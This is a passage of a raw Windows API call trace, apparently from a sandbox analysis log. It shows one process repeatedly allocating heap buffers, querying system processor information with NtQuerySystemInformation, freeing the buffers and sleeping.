dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0282.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0282.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0282.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0282.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0282.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0282.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0282.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.127] Sleep (dwMilliseconds=0x110) [0282.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0282.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0282.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0282.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0282.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0282.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0282.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0282.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0282.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.145] Sleep (dwMilliseconds=0x110) [0282.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0282.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0282.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0282.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0282.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0282.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0282.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0282.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0282.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.161] Sleep (dwMilliseconds=0x110) [0282.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0282.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0282.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0282.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0282.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0282.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0282.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0282.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0282.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.176] Sleep (dwMilliseconds=0x110) [0282.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0282.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0282.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0282.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0282.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0282.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0282.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.189] Sleep (dwMilliseconds=0x110) [0282.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0282.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0282.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0282.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0282.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0282.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0282.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0282.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0282.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.234] Sleep (dwMilliseconds=0x110) [0282.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0282.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0282.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0282.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0282.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0282.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0282.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0282.272] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0282.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.273] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.273] Sleep (dwMilliseconds=0x110) [0282.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0282.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0282.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0282.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0282.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0282.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0282.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0282.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0282.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.284] Sleep (dwMilliseconds=0x110) [0282.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0282.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0282.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0282.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0282.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0282.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0282.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0282.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0282.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.302] Sleep (dwMilliseconds=0x110) [0282.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0282.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0282.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0282.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0282.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0282.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0282.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0282.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0282.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.317] Sleep (dwMilliseconds=0x110) [0282.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0282.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0282.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0282.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0282.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0282.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0282.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0282.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0282.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.334] Sleep (dwMilliseconds=0x110) [0282.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0282.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0282.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0282.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0282.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0282.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0282.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0282.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0282.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.345] Sleep (dwMilliseconds=0x110) [0282.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0282.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0282.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0282.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0282.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0282.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0282.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0282.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0282.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.368] Sleep (dwMilliseconds=0x110) [0282.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0282.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0282.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0282.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0282.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0282.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0282.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0282.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0282.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.375] Sleep (dwMilliseconds=0x110) [0282.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0282.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: 